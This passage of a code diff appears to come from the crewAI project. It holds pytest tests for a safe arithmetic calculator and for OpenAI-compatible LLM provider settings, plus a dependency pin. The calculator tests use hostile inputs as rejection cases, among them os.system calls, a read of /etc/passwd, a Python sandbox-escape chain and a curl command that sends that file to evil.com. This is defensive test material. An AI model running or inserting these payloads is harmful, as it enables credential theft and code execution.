assert calculator("2 ** 3 + 5 * (10 - 3)") == "43"
def test_integer_division(self):
assert calculator("9 / 3") == "3.0"
# ---- Malicious / unsafe expressions ----
class TestSafeCalculatorRejectsMaliciousInput:
"""The calculator MUST reject anything that is not pure arithmetic."""
def test_rejects_import_os(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("__import__('os').system('echo pwned')")
def test_rejects_eval(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("eval('1+1')")
def test_rejects_exec(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("exec('print(1)')")
def test_rejects_open_file(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("open('/etc/passwd').read()")
def test_rejects_dunder_access(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("().__class__.__bases__[0].__subclasses__()")
def test_rejects_string_literals(self):
with pytest.raises(ValueError):
calculator("'hello'")
def test_rejects_list_comprehension(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("[x for x in range(10)]")
def test_rejects_lambda(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("(lambda: 1)()")
def test_rejects_attribute_access(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("(1).__class__")
def test_rejects_variable_names(self):
with pytest.raises(ValueError):
calculator("x + 1")
def test_rejects_curl_exfiltration(self):
with pytest.raises((ValueError, SyntaxError)):
calculator(
"__import__('os').system("
"'curl https://evil.com/exfil?data=' + "
"open('/etc/passwd').read())"
)
def test_rejects_semicolon_statement(self):
with pytest.raises(SyntaxError):
calculator("1; import os")
def test_rejects_walrus_operator(self):
with pytest.raises((ValueError, SyntaxError)):
calculator("(x := 42)")
def test_rejects_boolean_ops(self):
with pytest.raises(ValueError):
calculator("True and False")
# ---- Template sanity check ----
class TestTemplateDoesNotContainEval:
"""Ensure the AGENTS.md template no longer ships raw eval()."""
def test_no_bare_eval_in_calculator_block(self):
source = _extract_calculator_source()
# The word "eval" may appear in _safe_eval or ast-related names,
# but a bare `eval(` call on its own line must not exist.
assert "return str(eval(expression))" not in source
def test_template_uses_ast_parse(self):
source = _extract_calculator_source()
assert "ast.parse" in source

View File

@@ -0,0 +1 @@
"""Tests for OpenAI-compatible providers."""

View File

@@ -0,0 +1,310 @@
"""Tests for OpenAI-compatible providers."""
import os
from unittest.mock import MagicMock, patch
import pytest
from crewai.llm import LLM
from crewai.llms.providers.openai_compatible.completion import (
OPENAI_COMPATIBLE_PROVIDERS,
OpenAICompatibleCompletion,
ProviderConfig,
_normalize_ollama_base_url,
)
class TestProviderConfig:
"""Tests for ProviderConfig dataclass."""
def test_provider_config_immutable(self):
"""Test that ProviderConfig is immutable (frozen)."""
config = ProviderConfig(
base_url="https://example.com/v1",
api_key_env="TEST_API_KEY",
)
with pytest.raises(AttributeError):
config.base_url = "https://other.com/v1"
def test_provider_config_defaults(self):
"""Test ProviderConfig default values."""
config = ProviderConfig(
base_url="https://example.com/v1",
api_key_env="TEST_API_KEY",
)
assert config.base_url_env is None
assert config.default_headers == {}
assert config.api_key_required is True
assert config.default_api_key is None
class TestProviderRegistry:
"""Tests for the OPENAI_COMPATIBLE_PROVIDERS registry."""
def test_openrouter_config(self):
"""Test OpenRouter provider configuration."""
config = OPENAI_COMPATIBLE_PROVIDERS["openrouter"]
assert config.base_url == "https://openrouter.ai/api/v1"
assert config.api_key_env == "OPENROUTER_API_KEY"
assert config.base_url_env == "OPENROUTER_BASE_URL"
assert "HTTP-Referer" in config.default_headers
assert config.api_key_required is True
def test_deepseek_config(self):
"""Test DeepSeek provider configuration."""
config = OPENAI_COMPATIBLE_PROVIDERS["deepseek"]
assert config.base_url == "https://api.deepseek.com/v1"
assert config.api_key_env == "DEEPSEEK_API_KEY"
assert config.api_key_required is True
def test_ollama_config(self):
"""Test Ollama provider configuration."""
config = OPENAI_COMPATIBLE_PROVIDERS["ollama"]
assert config.base_url == "http://localhost:11434/v1"
assert config.api_key_env == "OLLAMA_API_KEY"
assert config.base_url_env == "OLLAMA_HOST"
assert config.api_key_required is False
assert config.default_api_key == "ollama"
def test_ollama_chat_is_alias(self):
"""Test ollama_chat is configured same as ollama."""
ollama = OPENAI_COMPATIBLE_PROVIDERS["ollama"]
ollama_chat = OPENAI_COMPATIBLE_PROVIDERS["ollama_chat"]
assert ollama.base_url == ollama_chat.base_url
assert ollama.api_key_required == ollama_chat.api_key_required
def test_hosted_vllm_config(self):
"""Test hosted_vllm provider configuration."""
config = OPENAI_COMPATIBLE_PROVIDERS["hosted_vllm"]
assert config.base_url == "http://localhost:8000/v1"
assert config.api_key_env == "VLLM_API_KEY"
assert config.api_key_required is False
assert config.default_api_key == "dummy"
def test_cerebras_config(self):
"""Test Cerebras provider configuration."""
config = OPENAI_COMPATIBLE_PROVIDERS["cerebras"]
assert config.base_url == "https://api.cerebras.ai/v1"
assert config.api_key_env == "CEREBRAS_API_KEY"
assert config.api_key_required is True
def test_dashscope_config(self):
"""Test Dashscope provider configuration."""
config = OPENAI_COMPATIBLE_PROVIDERS["dashscope"]
assert config.base_url == "https://dashscope-intl.aliyuncs.com/compatible-mode/v1"
assert config.api_key_env == "DASHSCOPE_API_KEY"
assert config.api_key_required is True
class TestNormalizeOllamaBaseUrl:
"""Tests for _normalize_ollama_base_url helper."""
def test_adds_v1_suffix(self):
"""Test that /v1 is added when missing."""
assert _normalize_ollama_base_url("http://localhost:11434") == "http://localhost:11434/v1"
def test_preserves_existing_v1(self):
"""Test that existing /v1 is preserved."""
assert _normalize_ollama_base_url("http://localhost:11434/v1") == "http://localhost:11434/v1"
def test_strips_trailing_slash(self):
"""Test that trailing slash is handled."""
assert _normalize_ollama_base_url("http://localhost:11434/") == "http://localhost:11434/v1"
def test_handles_v1_with_trailing_slash(self):
"""Test /v1/ is normalized."""
assert _normalize_ollama_base_url("http://localhost:11434/v1/") == "http://localhost:11434/v1"
class TestOpenAICompatibleCompletion:
"""Tests for OpenAICompatibleCompletion class."""
def test_unknown_provider_raises_error(self):
"""Test that unknown provider raises ValueError."""
with pytest.raises(ValueError, match="Unknown OpenAI-compatible provider"):
OpenAICompatibleCompletion(model="test", provider="unknown_provider")
def test_missing_required_api_key_raises_error(self):
"""Test that missing required API key raises ValueError."""
# Clear any existing env var
env_key = "DEEPSEEK_API_KEY"
original = os.environ.pop(env_key, None)
try:
with pytest.raises(ValueError, match="API key required"):
OpenAICompatibleCompletion(model="deepseek-chat", provider="deepseek")
finally:
if original:
os.environ[env_key] = original
def test_api_key_from_env(self):
"""Test API key is read from environment variable."""
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key-from-env"}):
completion = OpenAICompatibleCompletion(
model="deepseek-chat", provider="deepseek"
)
assert completion.api_key == "test-key-from-env"
def test_explicit_api_key_overrides_env(self):
"""Test explicit API key overrides environment variable."""
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "env-key"}):
completion = OpenAICompatibleCompletion(
model="deepseek-chat",
provider="deepseek",
api_key="explicit-key",
)
assert completion.api_key == "explicit-key"
def test_default_api_key_for_optional_providers(self):
"""Test default API key is used for providers that don't require it."""
# Ollama doesn't require API key
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
assert completion.api_key == "ollama"
def test_base_url_from_config(self):
"""Test base URL is set from provider config."""
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
completion = OpenAICompatibleCompletion(
model="deepseek-chat", provider="deepseek"
)
assert completion.base_url == "https://api.deepseek.com/v1"
def test_base_url_from_env(self):
"""Test base URL is read from environment variable."""
with patch.dict(
os.environ,
{"DEEPSEEK_API_KEY": "test-key", "DEEPSEEK_BASE_URL": "https://custom.deepseek.com/v1"},
):
completion = OpenAICompatibleCompletion(
model="deepseek-chat", provider="deepseek"
)
assert completion.base_url == "https://custom.deepseek.com/v1"
def test_explicit_base_url_overrides_all(self):
"""Test explicit base URL overrides env and config."""
with patch.dict(
os.environ,
{"DEEPSEEK_API_KEY": "test-key", "DEEPSEEK_BASE_URL": "https://env.deepseek.com/v1"},
):
completion = OpenAICompatibleCompletion(
model="deepseek-chat",
provider="deepseek",
base_url="https://explicit.deepseek.com/v1",
)
assert completion.base_url == "https://explicit.deepseek.com/v1"
def test_ollama_base_url_normalized(self):
"""Test Ollama base URL is normalized to include /v1."""
with patch.dict(os.environ, {"OLLAMA_HOST": "http://custom-ollama:11434"}):
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
assert completion.base_url == "http://custom-ollama:11434/v1"
def test_openrouter_headers(self):
"""Test OpenRouter has HTTP-Referer header."""
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
completion = OpenAICompatibleCompletion(
model="anthropic/claude-3-opus", provider="openrouter"
)
assert completion.default_headers is not None
assert "HTTP-Referer" in completion.default_headers
def test_custom_headers_merged_with_defaults(self):
"""Test custom headers are merged with provider defaults."""
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
completion = OpenAICompatibleCompletion(
model="anthropic/claude-3-opus",
provider="openrouter",
default_headers={"X-Custom": "value"},
)
assert completion.default_headers is not None
assert "HTTP-Referer" in completion.default_headers
assert completion.default_headers.get("X-Custom") == "value"
def test_supports_function_calling(self):
"""Test that function calling is supported."""
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
assert completion.supports_function_calling() is True
class TestLLMIntegration:
"""Tests for LLM factory integration with OpenAI-compatible providers."""
def test_llm_creates_openai_compatible_for_deepseek(self):
"""Test LLM factory creates OpenAICompatibleCompletion for DeepSeek."""
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
llm = LLM(model="deepseek/deepseek-chat")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "deepseek"
assert llm.model == "deepseek-chat"
def test_llm_creates_openai_compatible_for_ollama(self):
"""Test LLM factory creates OpenAICompatibleCompletion for Ollama."""
llm = LLM(model="ollama/llama3")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "ollama"
assert llm.model == "llama3"
def test_llm_creates_openai_compatible_for_openrouter(self):
"""Test LLM factory creates OpenAICompatibleCompletion for OpenRouter."""
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
llm = LLM(model="openrouter/anthropic/claude-3-opus")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "openrouter"
# Model should include the full path after provider prefix
assert llm.model == "anthropic/claude-3-opus"
def test_llm_creates_openai_compatible_for_hosted_vllm(self):
"""Test LLM factory creates OpenAICompatibleCompletion for hosted_vllm."""
llm = LLM(model="hosted_vllm/meta-llama/Llama-3-8b")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "hosted_vllm"
def test_llm_creates_openai_compatible_for_cerebras(self):
"""Test LLM factory creates OpenAICompatibleCompletion for Cerebras."""
with patch.dict(os.environ, {"CEREBRAS_API_KEY": "test-key"}):
llm = LLM(model="cerebras/llama3-8b")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "cerebras"
def test_llm_creates_openai_compatible_for_dashscope(self):
"""Test LLM factory creates OpenAICompatibleCompletion for Dashscope."""
with patch.dict(os.environ, {"DASHSCOPE_API_KEY": "test-key"}):
llm = LLM(model="dashscope/qwen-turbo")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "dashscope"
def test_llm_with_explicit_provider(self):
"""Test LLM with explicit provider parameter."""
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
llm = LLM(model="deepseek-chat", provider="deepseek")
assert isinstance(llm, OpenAICompatibleCompletion)
assert llm.provider == "deepseek"
assert llm.model == "deepseek-chat"
def test_llm_passes_kwargs_to_completion(self):
"""Test LLM passes kwargs to OpenAICompatibleCompletion."""
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
llm = LLM(
model="deepseek/deepseek-chat",
temperature=0.7,
max_tokens=1000,
)
assert llm.temperature == 0.7
assert llm.max_tokens == 1000
class TestCallMocking:
"""Tests for mocking the call method."""
def test_call_method_can_be_mocked(self):
"""Test that the call method can be mocked for testing."""
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
with patch.object(completion, "call", return_value="Mocked response"):
result = completion.call("Test message")
assert result == "Mocked response"
def test_acall_method_exists(self):
"""Test that acall method exists for async calls."""
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
assert hasattr(completion, "acall")
assert callable(completion.acall)

View File

@@ -211,7 +211,7 @@ def test_llm_passes_additional_params():
def test_get_custom_llm_provider_openrouter():
llm = LLM(model="openrouter/deepseek/deepseek-chat")
llm = LLM(model="openrouter/deepseek/deepseek-chat", is_litellm=True)
assert llm._get_custom_llm_provider() == "openrouter"
@@ -232,7 +232,9 @@ def test_validate_call_params_supported():
# Patch supports_response_schema to simulate a supported model.
with patch("crewai.llm.supports_response_schema", return_value=True):
llm = LLM(
model="openrouter/deepseek/deepseek-chat", response_format=DummyResponse
model="openrouter/deepseek/deepseek-chat",
response_format=DummyResponse,
is_litellm=True,
)
# Should not raise any error.
llm._validate_call_params()

2
uv.lock generated
View File

@@ -1241,7 +1241,7 @@ requires-dist = [
{ name = "json5", specifier = "~=0.10.0" },
{ name = "jsonref", specifier = "~=1.1.0" },
{ name = "lancedb", specifier = ">=0.29.2" },
{ name = "litellm", marker = "extra == 'litellm'", specifier = ">=1.74.9,<3" },
{ name = "litellm", marker = "extra == 'litellm'", specifier = ">=1.74.9,<=1.82.6" },
{ name = "mcp", specifier = "~=1.26.0" },
{ name = "mem0ai", marker = "extra == 'mem0'", specifier = "~=0.1.94" },
{ name = "openai", specifier = ">=1.83.0,<3" },